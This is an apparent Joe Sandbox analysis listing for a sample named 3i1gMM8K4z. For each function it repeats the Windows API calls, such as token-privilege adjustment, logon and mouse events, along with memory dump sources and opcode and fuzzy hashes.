                                                                                                                            • Source File: 00000000.00000002.1729732647.0000000000EE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EE0000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.1729717927.0000000000EE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1729788981.0000000000F6F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1729788981.0000000000F94000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1729827694.0000000000F9E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1729851644.0000000000FA7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_ee0000_3i1gMM8K4z.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: ErrorMode$DiskFreeSpace
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 1682464887-0
                                                                                                                            • Opcode ID: 6000d238f3828c4773ebfb2bfef433208b2e3970274ce7439d60c24cc7ddac3c
                                                                                                                            • Instruction ID: a1907a77b0c1e95af816611f0b8eb44fed888a89139b93f25de376d2f7e16547
                                                                                                                            • Opcode Fuzzy Hash: 6000d238f3828c4773ebfb2bfef433208b2e3970274ce7439d60c24cc7ddac3c
                                                                                                                            • Instruction Fuzzy Hash: AF213275A0010CEFCB00EFA5D884AEDBBF8FF49314F1480AAE905AB362DB319955DB55
                                                                                                                            Function 00F387E1 Relevance: 4.6, APIs: 3, Instructions: 67COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                              • Part of subcall function 00F00DB6: std::exception::exception.LIBCMT ref: 00F00DEC
                                                                                                                              • Part of subcall function 00F00DB6: __CxxThrowException@8.LIBCMT ref: 00F00E01
                                                                                                                            • LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 00F3882B
                                                                                                                            • AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 00F38858
                                                                                                                            • GetLastError.KERNEL32 ref: 00F38865
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.1729732647.0000000000EE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EE0000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.1729717927.0000000000EE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1729788981.0000000000F6F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1729788981.0000000000F94000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1729827694.0000000000F9E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1729851644.0000000000FA7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_ee0000_3i1gMM8K4z.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: AdjustErrorException@8LastLookupPrivilegePrivilegesThrowTokenValuestd::exception::exception
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 1922334811-0
                                                                                                                            • Opcode ID: 345d22ff738928ff2ab999c6b306898e374a9a04253ddab175687573e4eaeebc
                                                                                                                            • Instruction ID: df388ca0f8ebe65fdff1bad2c19c8addaa4b7669ecb18756527c1e19fcf7658d
                                                                                                                            • Opcode Fuzzy Hash: 345d22ff738928ff2ab999c6b306898e374a9a04253ddab175687573e4eaeebc
                                                                                                                            • Instruction Fuzzy Hash: 8D118FB2814305AFE718DFA4EC85D6BB7F8EB44760B20852EF45597241EF74BC419B60
                                                                                                                            Function 00F3874B Relevance: 4.5, APIs: 3, Instructions: 43memoryCOMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • AllocateAndInitializeSid.ADVAPI32(?,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,?), ref: 00F38774
                                                                                                                            • CheckTokenMembership.ADVAPI32(00000000,?,?), ref: 00F3878B
                                                                                                                            • FreeSid.ADVAPI32(?), ref: 00F3879B
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.1729732647.0000000000EE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EE0000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.1729717927.0000000000EE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1729788981.0000000000F6F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1729788981.0000000000F94000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1729827694.0000000000F9E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1729851644.0000000000FA7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_ee0000_3i1gMM8K4z.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: AllocateCheckFreeInitializeMembershipToken
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 3429775523-0
                                                                                                                            • Opcode ID: 6200a16c98227232fec19bab57f21a19fa0dbb0376768ca04befe8db2910c819
                                                                                                                            • Instruction ID: 0eacd9b0052dd077a122f720b551b98a6f7d8698a23a98793e736b56e831a74e
                                                                                                                            • Opcode Fuzzy Hash: 6200a16c98227232fec19bab57f21a19fa0dbb0376768ca04befe8db2910c819
                                                                                                                            • Instruction Fuzzy Hash: B0F04975A1130CBFDF00DFF4DD89AAEBBBCEF08311F1044A9E911E2281E6756A089B50
                                                                                                                            Function 00F44C7F Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 31COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • mouse_event.USER32(00000800,00000000,00000000,00000088,00000000), ref: 00F44CB3
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.1729732647.0000000000EE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EE0000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.1729717927.0000000000EE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1729788981.0000000000F6F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1729788981.0000000000F94000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1729827694.0000000000F9E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1729851644.0000000000FA7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_ee0000_3i1gMM8K4z.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: mouse_event
                                                                                                                            • String ID: DOWN
                                                                                                                            • API String ID: 2434400541-711622031
                                                                                                                            • Opcode ID: 291194139a1eabaa11c534397ad59f5980be731f31b8a0e0f6afced53e0ec350
                                                                                                                            • Instruction ID: 90e4471c75b392040e3b695045684b21d1d967de89678f3a576e28883c559d70
                                                                                                                            • Opcode Fuzzy Hash: 291194139a1eabaa11c534397ad59f5980be731f31b8a0e0f6afced53e0ec350
                                                                                                                            • Instruction Fuzzy Hash: 17E0462229D72138F9842A28FC06FB72A8C8B22335B140206FD14E54C1EE847C8234BA
                                                                                                                            Function 00F4C6D1 Relevance: 3.1, APIs: 2, Instructions: 52fileCOMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • FindFirstFileW.KERNEL32(?,?), ref: 00F4C6FB
                                                                                                                            • FindClose.KERNEL32(00000000), ref: 00F4C72B
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.1729732647.0000000000EE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EE0000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.1729717927.0000000000EE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1729788981.0000000000F6F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1729788981.0000000000F94000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1729827694.0000000000F9E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1729851644.0000000000FA7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_ee0000_3i1gMM8K4z.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: Find$CloseFileFirst
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 2295610775-0
                                                                                                                            • Opcode ID: 9f0937b021dfccc5dbf99cac07ee819e86f36277a4efb72bb5fb1c21b54458cc
                                                                                                                            • Instruction ID: 438a4a0c639ea4c8a61b1b10a94a9c48ba2db232e0c4992b2d59c2266459255e
                                                                                                                            • Opcode Fuzzy Hash: 9f0937b021dfccc5dbf99cac07ee819e86f36277a4efb72bb5fb1c21b54458cc
                                                                                                                            • Instruction Fuzzy Hash: 2A11A1726002049FDB10DF29D845A2AF7E8FF85324F00851EF8A9D72A1DB70AC05DF81
                                                                                                                            Function 00F4A06A Relevance: 3.0, APIs: 2, Instructions: 31windowCOMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • GetLastError.KERNEL32(00000000,?,00000FFF,00000000,00000016,?,00F59468,?,00F6FB84,?), ref: 00F4A097
                                                                                                                            • FormatMessageW.KERNEL32(00001000,00000000,000000FF,00000000,?,00000FFF,00000000,00000016,?,00F59468,?,00F6FB84,?), ref: 00F4A0A9
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.1729732647.0000000000EE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EE0000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.1729717927.0000000000EE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1729788981.0000000000F6F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1729788981.0000000000F94000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1729827694.0000000000F9E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1729851644.0000000000FA7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_ee0000_3i1gMM8K4z.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: ErrorFormatLastMessage
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 3479602957-0
                                                                                                                            • Opcode ID: 278d1176f9030bbd9434039bb8e2bba39d00779a8b0594fb806c8a37610741b2
                                                                                                                            • Instruction ID: 4e7337317e455e957e18f44f4feb7776238e728cfcd7f989ca1b9b4be186ff88
                                                                                                                            • Opcode Fuzzy Hash: 278d1176f9030bbd9434039bb8e2bba39d00779a8b0594fb806c8a37610741b2
                                                                                                                            • Instruction Fuzzy Hash: FCF0273654422DBBDB209FA4DC48FEA776CFF08361F004265FD18D3180D6709944DBA1
                                                                                                                            Function 00F381CB Relevance: 3.0, APIs: 2, Instructions: 22COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000,?,00F38309), ref: 00F381E0
                                                                                                                            • CloseHandle.KERNEL32(?,?,00F38309), ref: 00F381F2
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.1729732647.0000000000EE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EE0000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.1729717927.0000000000EE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1729788981.0000000000F6F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1729788981.0000000000F94000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1729827694.0000000000F9E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1729851644.0000000000FA7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_ee0000_3i1gMM8K4z.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: AdjustCloseHandlePrivilegesToken
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 81990902-0
                                                                                                                            • Opcode ID: a57c55daadbce7bcaff01be0ec871fd25a9c89331c28bd547a5e2ad16b6c8ca9
                                                                                                                            • Instruction ID: 47343def59be027ba7e54c96b29b02e4240e9c16676850c77e2b656710f38a5c
                                                                                                                            • Opcode Fuzzy Hash: a57c55daadbce7bcaff01be0ec871fd25a9c89331c28bd547a5e2ad16b6c8ca9
                                                                                                                            • Instruction Fuzzy Hash: FFE0EC72014611AFE7252B60FC09E777BEAEF04360B24882DF8A684470DB66AC91FB10
                                                                                                                            Function 00F0A155 Relevance: 3.0, APIs: 2, Instructions: 8COMMONLIBRARYCODE
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • SetUnhandledExceptionFilter.KERNEL32(00000000,?,00F08D57,?,?,?,00000001), ref: 00F0A15A
                                                                                                                            • UnhandledExceptionFilter.KERNEL32(?,?,?,00000001), ref: 00F0A163
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.1729732647.0000000000EE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EE0000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.1729717927.0000000000EE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1729788981.0000000000F6F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1729788981.0000000000F94000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1729827694.0000000000F9E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1729851644.0000000000FA7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_ee0000_3i1gMM8K4z.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: ExceptionFilterUnhandled
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 3192549508-0
                                                                                                                            • Opcode ID: 85239e0854a08da84e2d35a1533e334105a92e5fac3313ed3b46a8f3fab9dbf4
                                                                                                                            • Instruction ID: 34febaf63c8de296c5c2f863d2d465cf02f4b0323e9098fddd618e98d46ffe81
                                                                                                                            • Opcode Fuzzy Hash: 85239e0854a08da84e2d35a1533e334105a92e5fac3313ed3b46a8f3fab9dbf4
                                                                                                                            • Instruction Fuzzy Hash: 05B0923105820CABCA002B91FC0AB883F68EB44AA2F404020F61D84262EBA25454AA91
                                                                                                                            Function 00F0F1D9 Relevance: 2.1, APIs: 1, Instructions: 645COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.1729732647.0000000000EE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EE0000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.1729717927.0000000000EE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1729788981.0000000000F6F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1729788981.0000000000F94000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1729827694.0000000000F9E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1729851644.0000000000FA7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_ee0000_3i1gMM8K4z.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID:
                                                                                                                            • API String ID:
                                                                                                                            • Opcode ID: f72ca9ac58f87e3945d516926e767231ab518f2a49e34ebbc416ddcba43deeed
                                                                                                                            • Instruction ID: 0b925cd1a5fab72f98db518936d75d57f97d593b4fe24efbd01a2e80d5650d58
                                                                                                                            • Opcode Fuzzy Hash: f72ca9ac58f87e3945d516926e767231ab518f2a49e34ebbc416ddcba43deeed
                                                                                                                            • Instruction Fuzzy Hash: 0C32E222D29F054DD7239638DC62335A289AFB73D4F15D737E81AB5DAAEB28C4C36101
                                                                                                                            Function 00F1242E Relevance: 1.8, APIs: 1, Instructions: 294COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.1729732647.0000000000EE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EE0000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.1729717927.0000000000EE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1729788981.0000000000F6F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1729788981.0000000000F94000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1729827694.0000000000F9E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1729851644.0000000000FA7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_ee0000_3i1gMM8K4z.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID:
                                                                                                                            • API String ID:
                                                                                                                            • Opcode ID: 716e3faa98484710214b60d8c5760e7b2fe4c406faac6f92ba2937fb94860ea4
                                                                                                                            • Instruction ID: 90a48a8af8fa2b34d8c43a8aee06f64fbd9885acebfa5d205279cb9b92931af5
                                                                                                                            • Opcode Fuzzy Hash: 716e3faa98484710214b60d8c5760e7b2fe4c406faac6f92ba2937fb94860ea4
                                                                                                                            • Instruction Fuzzy Hash: 12B1F120D2AF444DD2639A388875336B65CAFFB2D5F52D71BFC1A74D22EB2281C35142
                                                                                                                            Function 00F48889 Relevance: 1.6, APIs: 1, Instructions: 68COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • __time64.LIBCMT ref: 00F4889B
                                                                                                                              • Part of subcall function 00F0520A: GetSystemTimeAsFileTime.KERNEL32(00000000,?,?,?,00F48F6E,00000000,?,?,?,?,00F4911F,00000000,?), ref: 00F05213
                                                                                                                              • Part of subcall function 00F0520A: __aulldiv.LIBCMT ref: 00F05233
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.1729732647.0000000000EE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EE0000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.1729717927.0000000000EE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1729788981.0000000000F6F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1729788981.0000000000F94000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1729827694.0000000000F9E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1729851644.0000000000FA7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_ee0000_3i1gMM8K4z.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: Time$FileSystem__aulldiv__time64
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 2893107130-0
                                                                                                                            • Opcode ID: 71ecff0359ab6c9de78e9eb16f130061e481462eca3e4a7fc9709d624ccaff50
                                                                                                                            • Instruction ID: 8c9f7f0bcaae76ad6aed3cbdc1ba9b3cbed47b121d114ff2af31fe691c9eb5d9
                                                                                                                            • Opcode Fuzzy Hash: 71ecff0359ab6c9de78e9eb16f130061e481462eca3e4a7fc9709d624ccaff50
                                                                                                                            • Instruction Fuzzy Hash: E121E472A356108FC329CF25D841A52B7E1EFA5320B288E2CE4F5CB2C0CA34B905EB54
                                                                                                                            Function 00F387B1 Relevance: 1.5, APIs: 1, Instructions: 19COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • LogonUserW.ADVAPI32(?,00000001,?,?,00000000,00F38389), ref: 00F387D1
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.1729732647.0000000000EE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EE0000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.1729717927.0000000000EE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1729788981.0000000000F6F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1729788981.0000000000F94000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1729827694.0000000000F9E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1729851644.0000000000FA7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_ee0000_3i1gMM8K4z.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: LogonUser
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 1244722697-0
                                                                                                                            • Opcode ID: 657ae60a8982976ea0887ff52f4a01ddc4f1da492d562795d6e88cf3d79b6114
                                                                                                                            • Instruction ID: 89c00bb1137ac640cc947b92f1e261452b03a82d09223ec977ca6f36cf28da4a
                                                                                                                            • Opcode Fuzzy Hash: 657ae60a8982976ea0887ff52f4a01ddc4f1da492d562795d6e88cf3d79b6114
                                                                                                                            • Instruction Fuzzy Hash: 40D09E3226450EBBEF019EA4ED05EAE3B69EB04B01F408511FE25D51A1C7B5D935AB60
                                                                                                                            Function 00F0A124 Relevance: 1.5, APIs: 1, Instructions: 6COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • SetUnhandledExceptionFilter.KERNEL32(?), ref: 00F0A12A
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.1729732647.0000000000EE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EE0000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.1729717927.0000000000EE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1729788981.0000000000F6F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1729788981.0000000000F94000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1729827694.0000000000F9E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1729851644.0000000000FA7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_ee0000_3i1gMM8K4z.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: ExceptionFilterUnhandled
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 3192549508-0
                                                                                                                            • Opcode ID: 4d716bd5cbbffff2990be9590a877a2bfa89cc0bc55ff2636551ccc56b765d65
                                                                                                                            • Instruction ID: 8a15b5eac10adf69e0bda62cbafd2b8f2397e3c6c2566d93a928b2c50ca75550
                                                                                                                            • Opcode Fuzzy Hash: 4d716bd5cbbffff2990be9590a877a2bfa89cc0bc55ff2636551ccc56b765d65
                                                                                                                            • Instruction Fuzzy Hash: F0A0243000010CF7CF001F41FC054447F5CD7001D07004030F40C40133D773541055C0
                                                                                                                            Function 00EF8808 Relevance: .6, Instructions: 590COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.1729732647.0000000000EE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EE0000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.1729717927.0000000000EE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1729788981.0000000000F6F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1729788981.0000000000F94000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1729827694.0000000000F9E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1729851644.0000000000FA7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_ee0000_3i1gMM8K4z.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID:
                                                                                                                            • API String ID:
                                                                                                                            • Opcode ID: a2862c7f074fff6e5cb05e10c1342ccce4eef19603255f82a360b45259e89dbd
                                                                                                                            • Instruction ID: 00f9545f7b4d0690b415d9425b6fb0a2aff96bab7430016f414beeb1b41953d8
                                                                                                                            • Opcode Fuzzy Hash: a2862c7f074fff6e5cb05e10c1342ccce4eef19603255f82a360b45259e89dbd
                                                                                                                            • Instruction Fuzzy Hash: 6D224631A0490ACBCF388B24C5D477C77A1FF81768F28906BDA46AB592EB70DD91E741
                                                                                                                            Function 00F021C5 Relevance: .3, Instructions: 345COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.1729732647.0000000000EE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EE0000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.1729717927.0000000000EE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1729788981.0000000000F6F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1729788981.0000000000F94000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1729827694.0000000000F9E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1729851644.0000000000FA7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_ee0000_3i1gMM8K4z.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID:
                                                                                                                            • API String ID:
                                                                                                                            • Opcode ID: bf6ffcbe3773841c348058a39a16573d3b2338b254e5945c46ce03dce2746f28
                                                                                                                            • Instruction ID: a2cdd038141a2e6cb92a58c8659bef0dfdc3b70aac2486e8b3c340a6d61264ac
                                                                                                                            • Opcode Fuzzy Hash: bf6ffcbe3773841c348058a39a16573d3b2338b254e5945c46ce03dce2746f28
                                                                                                                            • Instruction Fuzzy Hash: 0AC1A7326061930ADF6D4739C43813EFBA16EA27B135A075DD8B3CB1D5EE20C965F620
                                                                                                                            Function 00F025FA Relevance: .3, Instructions: 341COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.1729732647.0000000000EE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EE0000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.1729717927.0000000000EE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1729788981.0000000000F6F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1729788981.0000000000F94000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1729827694.0000000000F9E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1729851644.0000000000FA7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_ee0000_3i1gMM8K4z.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID:
                                                                                                                            • API String ID:
                                                                                                                            • Opcode ID: a635e2a33a60bcf8d734eac2a911e111534612f0cd64c6a362f1e57f4f360174
                                                                                                                            • Instruction ID: 11289a6d1e5ce6b6cdd0089f03f61d43c4edf7c12f1b5484af0c73c56fd3382f
                                                                                                                            • Opcode Fuzzy Hash: a635e2a33a60bcf8d734eac2a911e111534612f0cd64c6a362f1e57f4f360174
                                                                                                                            • Instruction Fuzzy Hash: B8C1763760619309DF6D4739C47813EFAA16EA27B135A076ED4B2DB1D4EE20C925F620
                                                                                                                            Function 00F01978 Relevance: .3, Instructions: 323COMMON
